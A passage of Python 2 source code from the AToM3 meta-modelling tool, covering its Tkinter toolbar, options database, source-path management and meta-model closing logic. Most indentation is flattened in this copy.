mergeds = []+self.ASGroot.mergedASG
for asg_merged in mergeds:
print "Opening metamodel::", asg_merged.metaModelName
#name = ASGroot.getGUIName( asg_merged.metaModelName )[0]
#if( name not in self.openFormalismsList ):
# print name, self.openFormalismsList
self.openMetaModel(asg_merged.metaModelName, 0, 0)
self.ASGroot.writeContents(self, genGraphics) # draw contents of ASGroot if any
# Don't ask politely, just grab the bloody focus :D
# NOTE: this is *needed* because a tkMessageBox can steal the focus
# on startup, thus killing all the keybindings! Ewwww.
self.parent.focus_force()
self.systemRestorePoint = ( sys.modules.copy() , sys.path[:] )
#print sys.path, "<--- System restore point\n\n"
  def debug(self, console=True ):
    # Handy way to find how you get to some piece of code...
    from traceback import format_stack
    stack = ''.join( format_stack() )
    if( console ): print stack
    return stack
"""
# Here's how to get the name of the file your in (and just that)
from traceback import format_stack
stack = format_stack(limit=1)
if( stack ):
text = stack[0].split('\n')[0]
if( text[:7] == ' File ' ): text = text[7:]
"""
def getCanvas( self ):
return self.UMLmodel
def assembleToolbar(self):
"""
This method creates a self.toolBar Frame that is inside a XY-scrollable
canvas area. The frame can be used just like a regular frame :D
"""
self.toolBarFrame = Frame(self.parent)
self.toolBarBottomFrame = Frame(self.toolBarFrame)
self.toolBarCanvas = Canvas(master=self.toolBarFrame,
takefocus=1,
height= self.optionsDatabase.get(self.TOOLBAR_HEIGHT),
scrollregion= (0,0,0,0) )
self.toolBarCanvas.scrollX = Scrollbar(self.toolBarBottomFrame, takefocus=0, orient=HORIZONTAL)
self.toolBarCanvas.square = Canvas(self.toolBarBottomFrame, width=16, height=16)
self.toolBarCanvas.scrollY = Scrollbar(self.toolBarFrame, takefocus=0, orient=VERTICAL)
# Configure the scrollies
self.toolBarCanvas.scrollX.config(command=self.toolBarCanvas.xview )
self.toolBarCanvas.config( xscrollcommand=self.toolBarCanvas.scrollX.set)
self.toolBarCanvas.scrollY.config(command=self.toolBarCanvas.yview )
self.toolBarCanvas.config( yscrollcommand=self.toolBarCanvas.scrollY.set)
# This is the beautiful part: the Frame is tucked into the canvas
self.toolBar = Frame(self.toolBarCanvas)
self.toolBarCanvasHandler = self.toolBarCanvas.create_window(0,0,
window=self.toolBar, anchor=NW )
# This image is displayed in the TOP-Left of AToM3 at all times, also triggers old menu system
self.mainLogoPhotoimage = Embedded_Images().getMainLogo()
# self.atom3MenuButton = Button(self.toolBarFrame,
# image=self.mainLogoPhotoimage, bg="white", fg="white",
# command=lambda s=self,e=None: s.UI_Statechart.event("Options",e))
def handler():
if(self.optionsDatabase.showOptionsDatabase()):
self.loadImmediateOptions()
self.atom3MenuButton = Button(self.toolBarFrame,
image=self.mainLogoPhotoimage, bg="white", fg="white",
command=handler)
#command=lambda s=self: toggleMainToolMenu(s) )
self.atom3MenuButton.pack( side=LEFT,fill=Y )
def handler( event, button = self.atom3MenuButton ):
button.configure( bg='DarkOrchid4', activebackground='SpringGreen',
borderwidth=2, relief='groove' )
self.atom3MenuButton.bind( '<Enter>', handler)
def handler( event, button = self.atom3MenuButton ):
button.configure( bg='white', activebackground='white',
borderwidth=2, relief='raised' )
self.atom3MenuButton.bind( '<Leave>', handler)
self.toolBarFrame.pack( side=TOP, fill=X, expand=0)
self.toolBarCanvas.scrollX.pack(side = LEFT, fill=X, expand=1)
self.toolBarCanvas.square.pack(side = RIGHT, fill=X, expand=0)
#self.toolBarBottomFrame.pack(side = BOTTOM,fill=BOTH, expand=1)
#self.toolBarCanvas.pack(side = LEFT,fill=BOTH, expand=1)
#self.toolBarCanvas.scrollY.pack(side = LEFT,fill=Y, expand=0)
self.configureToolbar()
def configureToolbar( self, event=None ):
"""
Packs the toolbar. Scrollbars are packed only if needed. Scroll region
is set to just big enough to see everything.
"""
# This is the width, height that the toolbar is using 'virtually'
vx = self.toolBar.winfo_width()
vy = self.toolBar.winfo_height()
# This is the width,height that the toolbar is actually getting on screen
ax = self.toolBarCanvas.winfo_width()
ay = self.toolBarFrame.winfo_height()
xScroll = False
yScroll = False
useScrollbarY = bool( self.optionsDatabase.get(self.TOOLBAR_HEIGHT) )
if( useScrollbarY and vy > ay + 10 ): yScroll = True
if( vx > ax + 10 ): xScroll = True
# Configure the scrollable region
self.toolBarCanvas.configure( scrollregion = (0,0,vx,vy ) )
if( useScrollbarY ):
self.toolBarCanvas.configure( height=self.optionsDatabase.get(self.TOOLBAR_HEIGHT) )
else:
self.toolBarCanvas.configure( height=vy )
# What was previously packed... shall be forgotten!
self.toolBarCanvas.pack_forget()
self.toolBarBottomFrame.pack_forget()
self.toolBarCanvas.scrollY.pack_forget()
# Pack it all anew
if( xScroll ): self.toolBarBottomFrame.pack(side = BOTTOM,fill=X, expand=1)
self.toolBarCanvas.pack(side = LEFT,fill=X, expand=1)
if( yScroll ): self.toolBarCanvas.scrollY.pack(side = LEFT,fill=Y, expand=0)
def disableSnapGridForPrinting( self, flag=False):
""" Turns the SnapGrid on/off for printing/postscript """
SnapGrid.applyLayout( self, disableForPrinting = flag )
def toggleSnapGrid(self):
""" Quick way of toggling the Snap Grid on off """
if( self.snapGridInfoTuple ):
SnapGrid.applyLayout(self,disableForPrinting=True)
self.snapGridInfoTuple = None
else:
SnapGrid.applyLayout(self)
self.parent.update_idletasks()
def setupOptionDatabase( self ):
"""
Options Dictionary, save/load/dialog configuration
Default values are used if the database cannot be loaded
The database is saved/overwritten whenever the user presses "Ok"
"""
# Instantiate the Option Database module
self.optionsDatabase = OptionDatabase(self.parent,'Options_AToM3.py', 'AToM3 Options Configuration')
# Local methods/variables with short names to make things more readable :D
newOp = self.optionsDatabase.createNewOption
BE = OptionDialog.BOOLEAN_ENTRY
FE = OptionDialog.FILE_ENTRY
NE = OptionDialog.NO_ENTRY
IE = OptionDialog.INT_ENTRY
LFE = OptionDialog.LIST_FILE_ENTRY
SEP = OptionDialog.SEPERATOR
SE = OptionDialog.STRING_ENTRY
# Create New Options
# Format: OptionKey, defaultValue, valueType, promptString, helpString
# valueType = [ fileTypeCode, buttonLabel, fileType ]
# valueType = [ colorTypeCode, buttonLabel ]
# valueType = [ TypeCode ]
userAreaPath = os.path.split( USER_MODEL_PATH )[0]
newOp( self.STATIC_MENUBAR, False, BE ,"Enable top menubar", """
A static toolbar on the top of the window like many applications have.
This is legacy code from the 0.2 AToM3 version series.
It lacks many of the items present in the dynamically created popup-menus!
WARNING: Not recommended simply because it's missing so much... if you are
interested in upgrading it, please see StaticMenus.py, popupMenuElements.py,
and popupMenuCreator.py files in atom3/kernel/UserInterface/
""" )
newOp( self.EXTRA_CONSOLES, False, BE, "Enable debugging consoles", """
These consoles can allow you to query the state of variables & run methods at
run-time.
These consoles are legacies of the 0.2 AToM3 version series.
WARNING: They are a bit buggy...
""")
newOp( self.FULLSCREEN, False, BE, "Start AToM3 in fullscreen", """
This option is equivalent to starting AToM3 in windowed mode and then maximizing
the window to occupy the entire screen.
WARNING: May not work on all platforms. Works on Windows though! :) """ )
newOp( self.GEN_GRAPHICS, True, BE ,"Generate graphics",
"If disabled, AToM3 will not be able to open models containing graphics" )
newOp( self.SMOOTH_ARROWS, True, BE ,"Smooth arrows by default",
"If enabled, new arrows will be drawn smooth." )
newOp('line1','',SEP,'','' )
newOp( self.UI_BEHAVIOR_MODEL,
'',
[ FE, "Choose UI Model",[("Python File", "*.py")],
OptionDialog.FILEPATH, userAreaPath ],
"UI Behavior Model",
"Choose the statechart GUI behavior model you wish to use with AToM3\n\n"
+"Hint: the current model is located in:\n"
+"atom3/Kernel/UserInterface/defaultUI_Statechart/UI_Statechart_MDL.py\n"
+"\nSo you can simple load this up, then save it in the UserArea and"
+" modify it there.\n"
+"When done, Generate DES, and choose Compile with the Tkinter option\n"
+"Now you just need to point this here option to the compiled statechart"
+"\n\nNOTE: The class name of your statechart must be 'UI_Statechart_MDL'")
newOp( self.UI_KEYBINDS,
'',
[ FE, "Choose UI Keybinds",[("Python File", "*.py")],
OptionDialog.FILEPATH, userAreaPath ],
"UI Keybindings",
"This allows you to choose a customized keybinding file for use"
+" with AToM3.\n"
+"ie. You can copy the KeyBinds.py file in the Kerenl.UserInterface"
+"\ndirectory to the user area, modify it, then tell AToM3 to load"
+"\nit here, instead of the default one." )
# The Formalisms to have open...
newOp( self.OPEN_FORMALISMS, [],
[LFE, "Choose File",[("Meta-Model","*_META.py"),
("Python File", "*.py")],
OptionDialog.FILENAME_ONLY, META_MODEL_PATH ],
'Multi-Formalism Environment', """
Set which formalisms/meta-models you want AToM3 to START with by default.
All new formalisms can be found by the *_META.py extension, for old formalisms
you'll need to hunt and peck until you find the correct *.py file.
NOTE: This is overridden if you start atom3.py with arguments...
Example 1:
atom3.py CD_ClassDiagramsV3
This opens the formalism CD_ClassDiagramsV3_META.py
Example 2:
atom3.py D:\atom3\Kernel\UserInterface\defaultUI_Statechart\UI_Statechart_MDL.py
This opens all the formalisms needed for the model file. The model file must
have the _MDL.py extension or it will not be recognized. Spaces are allowed in
the path (the script atom3.py can put it together again), but make sure the path
is absolute, that is that it starts with a drive letter (for Windows users).
""")
# newOp( self.GG_CODE_GEN, '',
# [ FE, "Choose Grammar", [("Grammar File", "*_GG_exec.py"),
# ("Python File", "*.py")],
# OptionDialog.FILENAME_ONLY, userAreaPath ],
# "Button Grammar (Obsolete)", """
# When generating formalisms from meta-models, a grammar will automatically
# generate a button for each entity.
#
# UPDATE: In the Feb, 2006 version of AToM3 0.3 button generation grammars were
# removed from AToM3.
# """)
# Yeah, like we really need this:
# newOp( self.CODE_GEN_DIR, '',
# [ FE, "Choose Directory",[("Choose any file in directory", "*")],
# OptionDialog.RELATIVE_DIRNAME, userAreaPath ],
# "Directory for Code Generation",
# "Must be in the SourceCode or MetaModel subdirectories of AToM3\n\n"+
# "Note: Denis is trying to phase this thing out and use the path of the current open ER model instead." )
newOp( self.LASTOPEN_MODEL, [], NE, '' ) # List of open models
newOp( self.LASTOPEN_MMODEL, [], NE, '' ) # List of open meta-models
newOp( self.LAST_INITIAL_DIRS, [], NE, '' ) # Initial directories
newOp( self.SOURCE_PATHS, [], NE, '' ) # Paths to source code...
newOp('line2','',SEP,'','' )
newOp( self.UNDO_ENABLED, False, BE, "Enable Undo (Not recommended)", """
WARNING: Undo is not supported anymore. Undo CAN create unhandled exceptions!
Enabled (and working), it simply saves and loads the model (which is slow).
Part of the problem is that it does not save the model after each change.
Why no working undo? Because it was not built-in to AToM3 originally!
Adding it in afterwards is like putting a broken egg back together :p""")
    newOp( self.UNDO_MODS_PER_SAVE, 0, IE, "Modifications per undo", "Saves the model every X modifications to provide undo ability" )
newOp( self.UNDO_DEPTH, 20, IE, "Maximum undo depth", "When maximum undo depth reached, old undo files are overwritten" )
newOp( self.TOOLBAR_HEIGHT, 0, IE, "Toolbar height",
"How many pixels high the toolbar will be\n\n"+
"If the value \"0\" is set, the toolbar will always be just high enough\n"+
"Otherwise, if the height is set too low, scrolling in Y will be necessary" )
newOp( self.BUTTONS_PER_ROW, 12, IE, "Buttons per row",
"Maximum buttons a meta-model can display on a single row\n"+
"Additional rows will be added to fit extra buttons\n\n"+
"If the value \"0\" is set, the per meta-model defaults will be used\n\n"+
"This option only takes effect when openning new meta-models" )
newOp('line3','',SEP,'','' )
labelOpts = [OptionDialog.LABEL,"Times 12","red", "left" ]
connOpts = [OptionDialog.ENUM_ENTRY, "Pipe", "TCP/IP"]
solverOpts = [OptionDialog.ENUM_ENTRY, "Cassowary", "Equality", "Inequality" ]
optionList = [OptionDialog.SINGLE_LIST_ENTRY,
'Enable QOCA constraint solver', True, BE,
'If disabled, layout will not function correctly for some formalisms',
'Enable QOCA auto-solve', True, BE,
'Certain events trigger a re-solve automatically',
'QOCA solver type', "Cassowary", solverOpts,
'The various solver types use different metrics...',
'QOCA connection type', "Pipe", connOpts,
                 'Pipe connection automatically starts the QOCA java jar'
+' file\nTCP/IP requires manually starting the QOCA java'
+' jar server',
'QOCA server IP', '127.0.0.1', SE,
'IP address string if using TCP/IP connection mode',
'QOCA server port', 14059, IE,
'Port address integer if using TCP/IP connection mode',
'\nNote 1: Changes will take effect on AToM3 restart only'
+'\nNote 2: Pipe option assumes Java is in environment'
+' path', None,labelOpts,'',
]
newOp( self.QOCA_OPTIONS, [[False, True, "Cassowary", "Pipe",
'127.0.0.1', 14059, None]],
optionList, 'QOCA options',
'QOCA is an incremental constraint solver used for graphic layout')
    # Load the options from the file; on failure the defaults will be returned.
self.optionsDatabase.loadOptionsDatabase()
self.loadImmediateOptions( initilizationRunOnly = True )
def loadImmediateOptions(self, initilizationRunOnly = False ):
""" Instead of waiting for AToM3 restart, applies option changes immediately """
def relativeToAbsolutePath( pathDir ):
""" Converts a relative path to an absolute path in the ATOM3 context """
# Is it already absolute?
if( os.path.exists( pathDir ) ):
return pathDir
# Try in the User/Formalisms path
p = os.path.join( USER_MMODEL_PATH, pathDir )
if( os.path.exists( p ) ):
return p
# Try in the Formalisms path
p = os.path.join( META_MODEL_PATH, pathDir )
if( os.path.exists( p ) ):
return p
# Try in the source code path (kernel)
p = os.path.join( SOURCE_CODE_PATH, pathDir )
if( os.path.exists( p ) ):
return p
return ''
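    # Resolution order above: absolute path as given, then the User
    # Formalisms area, the central Formalisms area, and finally the kernel
    # source tree; '' signals that nothing matched.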
self.genGraphics = self.optionsDatabase.get(self.GEN_GRAPHICS)
self.GGforCodeGen = '' # self.optionsDatabase.get(self.GG_CODE_GEN)
self.codeGenDir = USER_MMODEL_PATH #self.optionsDatabase.get(self.CODE_GEN_DIR)
#self.codeGenDir = relativeToAbsolutePath( self.codeGenDir )
# openFormalismsList is a misleading name, what it really is:
    # A list of Formalisms in the Options to be opened when AToM3 starts
self.openFormalismsList = self.optionsDatabase.get(self.OPEN_FORMALISMS)
# Show Debugging Consoles?
if( self.optionsDatabase.get(self.EXTRA_CONSOLES) ):
if( initilizationRunOnly ):
self.console = Console(self)
self.debugConsole = DebugConsole(self)
else:
self.showConsole()
else:
if( not initilizationRunOnly ):
self.console.destroy()
self.debugConsole.destroy()
self.console = NoConsole(self)
self.debugConsole = NoConsole(self)
# Setup Initial Directories (for convenience)
self.initialDirectoryDict = self.optionsDatabase.get(self.LAST_INITIAL_DIRS)
if( not self.initialDirectoryDict ):
self.initialDirectoryDict = dict()
self.initialDirectoryDict[ 'OpenSaveModel' ] = MODEL_PATH
self.initialDirectoryDict[ 'OpenMetaModel' ] = META_MODEL_PATH
self.initialDirectoryDict[ 'OpenSaveTrans' ] = ""
self.initialDirectoryDict[ 'Documentation' ] = os.path.split( USER_MMODEL_PATH )[0]
# Load UI Behavior Statechart, and Keybinds
# Generates: self.UI_Statechart and self.createBindingsMethod
loadBehaviorModelOption(self, initilizationRunOnly)
loadKeybindsOption(self, initilizationRunOnly)
#todo: qoca
if(initilizationRunOnly):
qocaOptList = self.optionsDatabase.get(self.QOCA_OPTIONS)[0]
# If QOCA is enabled
if(qocaOptList[0]):
# If automatic re-solve is enabled
self.qocaAutosolve = qocaOptList[1]
solverTypeMap = {"Cassowary":SOLVER_CASS, "Equality":SOLVER_EQ,
"Inequality":SOLVER_INEQ}
solverType = solverTypeMap[qocaOptList[2]]
usePipe = (qocaOptList[3] == "Pipe")
command='java -jar "' + QOCAPATH + '"' # Java in environment path!
ip = qocaOptList[4]
port = qocaOptList[5]
self.qocaSolver = QocaSolver(usePipe, command, ip, port, solverType)
# QOCA disabled... implementation free interface presented
else:
self.qocaAutosolve = False
self.qocaSolver = QocaSolverAbstract()
try:
self.qocaSolver.connect()
except:
tkMessageBox.showinfo( "Could not start QOCA solver",
"See console for more details...",parent = self)
# If AToM3 is just starting, QUIT
if( initilizationRunOnly ): return
self.undoer.setUndoParameters( self.optionsDatabase.get(self.UNDO_ENABLED),
self.optionsDatabase.get(self.UNDO_DEPTH),
self.optionsDatabase.get(self.UNDO_MODS_PER_SAVE) )
# Show the top menu bar?
toggleMainToolMenu( self,
setState=self.optionsDatabase.get( self.STATIC_MENUBAR ) )
# Update the toolbar height
self.configureToolbar()
def historyManager( self, historyKey, newFilename ):
""" Adds the new filename to the options database at historyKey """
historyFiles = self.optionsDatabase.get( historyKey )
# Optimize the file history by removing models that no longer exist
optimizedList = []
for historyFile in historyFiles:
if( os.path.exists( historyFile ) ): optimizedList.append( historyFile )
# File is already there! Remove it (we want most recent on top)
if( newFilename in optimizedList ):
optimizedList.remove( newFilename )
# Add the new file to list
optimizedList = [newFilename] + optimizedList
# Cap the history depth
if( len( optimizedList ) > self.FILE_HISTORY_DEPTH ):
      optimizedList = optimizedList[:self.FILE_HISTORY_DEPTH]
# Set & save :D
self.optionsDatabase.set(historyKey, optimizedList)
self.optionsDatabase.saveOptionsDatabase()
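  # Illustrative behaviour (hypothetical filenames): with history [a, b, c],
  # re-adding b yields [b, a, c]; adding a new file d yields [d, a, b, c],
  # trimmed to FILE_HISTORY_DEPTH entries if the cap is exceeded.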
"""
Bridge to the connection drawing module
Otherwise older models would become incompatible :-(
Note: I had to relabel them with a "Bridge" in their names, because of name
clashes.
"""
def drawConnections(self, * listOfConnections ):
drawConnectionsBridge(self, * listOfConnections )
def showConnection( self, *args ):
return showConnectionBridge( self, *args )
def sourcePathOptionSave(self, showDialog = True ):
""" Saves the model paths to the option database """
# Gets paths that are in one of the two Formalisms directories
paths = []
for pathName in sys.path:
pathName = os.path.normpath( pathName )
if( os.path.commonprefix( [META_MODEL_PATH, pathName] ) == META_MODEL_PATH ):
paths.append( pathName )
elif(os.path.commonprefix( [USER_MMODEL_PATH, pathName] ) == USER_MMODEL_PATH ):
paths.append( pathName )
# No point saving if nothing has changed
if( paths == self.optionsDatabase.get(self.SOURCE_PATHS) ):
return
if( showDialog ):
myText = ''
myText += 'Save source paths\n'
myText += 'If not saved, path modifications will be lost when AToM3 is restarted'
dialog = Dialog.Dialog(None, {'title': "Source Paths",
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Save','Don\'t Save')})
if( dialog.num == 1 ): return
self.optionsDatabase.set(self.SOURCE_PATHS, paths)
self.optionsDatabase.saveOptionsDatabase()
def sourcePathOptionLoad(self):
""" Loads the model paths from the option database """
paths = self.optionsDatabase.get(self.SOURCE_PATHS)
for path in paths:
path = os.path.normpath( path )
if( path not in sys.path ):
sys.path.append( path )
def sourcePathManager(self, actionCode=0 ):
# Add new source path
if( actionCode == 0 ):
try:
dir = tkFileDialog.askdirectory(
title="Add source path",
initialdir=USER_MMODEL_PATH )
except:
dir = tkFileDialog.askopenfilename(
title="Add source path",
filetypes=[("Choose any file in model directory", "*")],
initialdir=USER_MMODEL_PATH )
if( dir ):
dir = os.path.split( dir )[0]
if( dir == '' ): return # Cancel
self.checkInSearchPath( dir )
# Did the added path create conflicts? If so, should we save it anyway? Probably...
if( self.sourcePathConflictAwareness() ):
return self.sourcePathOptionSave()
# Add more paths...
myText = 'If not saved, they will be lost on AToM3 exit'
dialog = Dialog.Dialog(None, {'title': "Adding Source Paths",
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Save & Close','Close', 'Add more paths')})
# Quit & save new paths
if( dialog.num == 0 ):
return self.sourcePathOptionSave( showDialog = False )
      # Quit & don't save
if( dialog.num == 1 ):
return
# Keep adding paths
if( dialog.num == 2 ):
return self.sourcePathManager(0)
# Remove source path
elif( actionCode == 1 ):
# Make a list of all the loaded meta-model paths
paths = []
indexMap = dict()
i = 0
j = 1
normModelPath = os.path.normpath( META_MODEL_PATH )
normUserModelPath = os.path.normpath( USER_MMODEL_PATH )
for loadedPath in sys.path:
normLoadedPath = os.path.normpath( loadedPath )
# The loaded path and the model path have the model path in common
# Therefore this is a model path that can be safely removed
if( os.path.commonprefix( [ normLoadedPath,normModelPath ] ) == normModelPath ):
paths.append( normLoadedPath )
indexMap[j] = i
j += 1
        elif( os.path.commonprefix( [ normLoadedPath,normUserModelPath ] ) == normUserModelPath ):
paths.append( normLoadedPath )
indexMap[j] = i
j += 1
i += 1
# Let the user chose the index of the path to remove
title = 'Path Removal Menu'
actionLabel = 'Remove'
index = self.popupMenuCreator.listChoicePopup(title, paths,actionLabel )
# Quit the menu
if( index == 0 ): return self.sourcePathOptionSave()
# Delete the path at index
del sys.path[ indexMap[index] ]
# Delete more menu items...
return self.sourcePathManager(1)
# Source path conflict finder
elif( actionCode == 2 ):
if( not self.sourcePathConflictAwareness() ):
tkMessageBox.showinfo( "Source Path Conflicts","None found.",parent = self)
# Help
else:
tkMessageBox.showinfo(
"Source Path Help",
"Some AToM3 models require the source path to other models\n"+
"Unfortunately, they simply assume that the source path is available to them\n"+
"Since there is no simple way to automatically add these paths, it is up to the user to do this.\n"+
"\nWARNING: When loading extra source paths, you may end up with duplicate source files!\n"+
"If this happens you will be explicitly warned and shown which files are duplicated.\n"
,parent = self)
def sourcePathConflictAwareness(self, showDialog=True, printToConsole=True ):
"""
Finds potential problems arising from multiple files with same name in
directories that have been simultaneously loaded.
"""
# Get the AToM3 base path, and the paths of all its loaded subdirectories
atom3Pattern = re.compile( '.*' + os.path.split( BASE_PATH )[1] )
sourcePaths = []
for pathname in sys.path:
if( atom3Pattern.search( pathname ) ):
sourcePaths.append( os.path.normpath( pathname ) )
# Find all duplicated files
sourceFileDict = dict()
    ignoreFilenameList = ['__init__.py', 'ByteCodeCleaner.py']
duplicateSourceFileList = []
for dir in sourcePaths:
if( not os.path.exists(dir) ): continue
for fileName in os.listdir(dir):
pathName = os.path.join(dir,fileName)
# Ignore directories
if( os.path.isdir(pathName) ): continue
# Ignore __init__.py files
        elif( fileName in ignoreFilenameList ): continue
# File without a duplicate
elif( not sourceFileDict.has_key( fileName) ):
sourceFileDict[ fileName ] = pathName
# Source file with a duplicate
else:
splitName = string.split( str(fileName), '.' )
if( splitName and len(splitName) > 1 and splitName[1] == 'py' ):
duplicateSourceFileList.append( (sourceFileDict[ fileName ],pathName) )
    # Show warning if duplicates occurred
if( duplicateSourceFileList ):
from filecmp import cmp
safeDuplicationString = ""
dangerousDuplicationString = ""
for file1,file2 in duplicateSourceFileList:
# Do the files have identical implementations?
if( cmp( file1, file2 ) ):
safeDuplicationString += "i) " + str(file1) + "\n" + "ii) " + str(file2) + "\n\n"
#safeDuplicationString += "Identical source pair (safe):\n" + \
# str(file1) + "\n" + str(file2) + "\n\n"
else:
dangerousDuplicationString += "i) " + str(file1) + "\n" + "ii) " + str(file2) + "\n\n"
#dangerousDuplicationString += "Different implementation source pair (dangerous):\n" + \
# str(file1) + "\n" + str(file2) + "\n\n"
if( safeDuplicationString ):
if( showDialog ):
if( len( safeDuplicationString ) < 300 ):
tkMessageBox.showwarning( "Safe Source Path Conflicts",safeDuplicationString,parent = self)
else:
tkMessageBox.showwarning( "Safe Source Path Conflicts",
safeDuplicationString[:300] + '\n\nSee console for more...\n',parent = self)
if( printToConsole ):
print "***********************************************************\n"
print "Safe Source Path Conflict Detected (Source files with ",
print "same implementation pairs and AToM3 cannot know which ",
print "to use)\n\n", safeDuplicationString
print "***********************************************************\n"
if( dangerousDuplicationString ):
if( showDialog ):
if( len( dangerousDuplicationString ) < 300 ):
tkMessageBox.showwarning( "Dangerous Source Path Conflicts",dangerousDuplicationString,parent = self)
else:
tkMessageBox.showwarning( "Dangerous Source Path Conflicts",
dangerousDuplicationString[:300] + '\n\nSee console for more...\n',parent = self)
if( printToConsole ):
print "***********************************************************\n"
print "Dangerous Source Path Conflict Detected (Source files with ",
print "different implementation pairs and AToM3 cannot know which ",
print "to use)\n\n", dangerousDuplicationString
print "***********************************************************\n"
return True
else:
return False
def addDirectoryWithModelName(self, modelName, noWarning = False ):
"""
Given just a model name, finds the model directory & adds it to path
Returns True on success, False on failure.
Created June 24,2004 by Denis Dube
"""
#noWarning = False
def findModelInPath( modelName, basePath ):
# Find all the model paths that potentially contain the model
modelDirList = []
for dirName in os.listdir(basePath):
if( os.path.isdir( os.path.join( basePath,dirName) ) ):
modelDirList.append(dirName)
# Searches through all the potential model paths, adds model if found
for modelDirName in modelDirList:
for fileName in os.listdir(os.path.join(basePath,modelDirName)):
if( modelName == fileName ):
modelSysPath = os.path.join(basePath,modelDirName)
self.checkInSearchPath( modelSysPath )
return True
return False
# Model could be in the meta model directory or source code directory
if( findModelInPath(modelName+'.py',USER_MMODEL_PATH ) ): return True
if( findModelInPath(modelName+'.py',META_MODEL_PATH ) ): return True
if( findModelInPath(modelName+'.py',SOURCE_CODE_PATH ) ): return True
# What if it's not found?
    # That means it's not in an immediate subfolder of AToM3.
# In that case I should probably give an error message...
if( not noWarning ):
if(len(modelName) > 10 and modelName[-10:] == '_META_META'):
modelName = modelName[:-5]
title = "ERROR in addDirectoryWithModelName() of: " + __file__
msg = "The formalism "+modelName+" could be found in neither of:\n\n" + \
META_MODEL_PATH + "\n\n" +SOURCE_CODE_PATH+"\n\n"+USER_MMODEL_PATH \
+ '\n\n'
msg += '\nExamples (for the X formalism):\n'
msg += ' Valid: ~\User Formalisms\X\X_META.py\n'
msg += ' Valid: ~\User Formalisms\Foobar\X_META.py\n'
msg += ' Invalid: ~\User Formalisms\X_META.py\n'
msg += ' Invalid: ~\User Formalisms\X\X\X_META.py\n'
msg += ' Invalid: C:\X_META.py'
print title
print msg
tkMessageBox.showerror(title, msg, parent=self)
#self.debug()
#raise Exception
return False
def configureUserActions(self):
"""
Fills the common actions for all formalisms...
"""
def doNaught(*args): pass
self.userActionsMap[self.IDLEMODE] = doNaught
self.userActionsMap[self.INSERTModel] = self.createNew_Model
self.userActionsMap[self.EXPANDModel] = self.expandModel
self.userActionsMap[self.SELECTgraph] = self.selectGraph
def closeMetaModel(self):
"""
Presents a window that shows the open metamodels,
allow to check some of them to be deleted
"""
# The old way of doing things...
if( 0 ):
numMetaModels = len(self.openMetaModels.getValue())
cm = ATOM3TypeDialog(self, self.openMetaModels) # Select the meta-model to delete
if cm.result_ok: # The user pressed Ok
self.removeMetaModels(numMetaModels)
self.putMetaModelName()
# The popup way...
else:
models = self.openMetaModels.getValue()
numMetaModels = len( models )
# Create list of strings for the popup, add a cancel option...
stringList = []
for model in models:
stringList.append( model.getValue() )
# Popup/Dialog config
title = 'Meta-Model Menu'
actionLabel = 'Remove'
      # Subtract 1 from index, since a Cancel button was added
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel ) - 1
if( index < 0 or index > numMetaModels ): return
# Delete delete delete...
self.openMetaModels.deleteItem( index )
self.removeMetaModels( numMetaModels )
self.putMetaModelName()
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
def putMetaModelName(self):
""" Updates the name of the current meta model and presents it in the Windows title bar """
mmodels = self.openMetaModels.getValue()
name = ""
if len(mmodels) > 0:
counter = 0
for mm in mmodels:
if counter == 0:
name = name + mm.toString()
else:
name = name + " + " + mm.toString()
counter = counter + 1
try:
if name == "":
self.parent.title("AToM3 " + self.VERSION)
else:
self.parent.title("AToM3 "+ self.VERSION + " using: "+name)
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
def removeMetaModels(self, numMetaModels):
"""
Closes one or more of the loaded metamodels (leaves only the present in
self.openMetaModels).
- numMetaModels: is the number of meta-models currently loaded
"""
omm = self.openMetaModels.getValue() # obtain the list of remaining meta-models
somm = [] # list with the meta-models' names
for openmm in omm: # for each ATOM3String...
somm.append(openmm.toString()) # append its value to somm
index, erased = 0, 0
while ( index < numMetaModels-erased ):
# The elements of buttonList are tuples ( <frame>, <formalism name>, <meta-model file>, <button1>, ...)
mm = self.buttonList[index][1] # get the GUI name
trueMM = self.buttonList[index][2] # get the name of the file where the meta-model is stored
dir, fileName = os.path.split(trueMM)
mmName = fileName[:len(fileName)-6] # that must be the name of the meta-model stored in entitiesInMetaModel
if not mm in somm: # It is not in the list, so we have erased it
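        # e.g. for mmName == 'Buttons' the two lines below execute
        #   from ASG_Buttons import ASG_Buttons
        # and instantiate ASG_Buttons(self).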
exec "from ASG_"+mmName+" import ASG_"+mmName+"\n"
anASG = eval("ASG_"+mmName+"(self)")
# Remove the model from sys.path as well, added by Denis Dube, June 25, 2004
if( dir in sys.path and dir not in CRITICAL_PATHS ):
sys.path.remove( dir )
# Remove sys modules loaded with that meta model
pattern = re.compile( "<module '\w*' from '"+mmName+"\w*" )
tmpModules = sys.modules.copy()
for key in tmpModules.keys():
match = pattern.search( str( tmpModules[key] ) )
if( match ): del sys.modules[ key ]
frame2delete = self.buttonList[index][0]
frame2delete.pack_forget() # erase panel from User Interface
# Delete the 'modes' of the buttons that we are to delete...
for idx in range(3, len(self.buttonList[index])): # iterate on the buttons of the meta-model
button2delete = self.buttonList[index][idx] # get the idx-button of the mm
if button2delete in self.modes.keys(): # check if the button has an associated mode
mode2delete = self.modes[button2delete]
del self.userActionsMap[mode2delete] # delete the associated action to that mode
del self.modes[button2delete] # delete that mode
erased = erased + 1 # increment the counter of erased metamodels
self.buttonList.remove(self.buttonList[index]) # remove element from the List
if self.console: self.console.appendText('Closing Meta-Model '+mm)
if mmName in self.entitiesInMetaModel.keys():
for entity in self.entitiesInMetaModel[mmName]: # for each entity defined in the meta-model
del self.CardinalityTable[entity] # delete also the info in CardinalityTable
if entity in self.ConnectivityMap.keys(): del self.ConnectivityMap[entity]
del self.entitiesInMetaModel[mmName]
# Map *_MM classnames to the *_META classnames
metaModelName = self.openGUI_ModelDict[ mmName + '_MM' ]
if( metaModelName[-5:] == '_META' ): metaModelName=metaModelName[:-5]
result = self.ASGroot.unMerge(anASG, metaModelName=metaModelName,
atom3i = self )
if type(result) != IntType:
self.ASGroot = result
else:
index = index+1
if self.openMetaModels.getValue() == []: # no meta-models are left
self.ASGroot.removeContents(self, 1) # clear contents (if any)
self.statusbar.event(StatusBar.MODEL, StatusBar.CLEAR, "Nonamed")
if self.console: self.console.appendText('Clearing model')
self.ASGroot = None
# empty the cardinality tables and the connectivity map.
self.CardinalityTable = {}
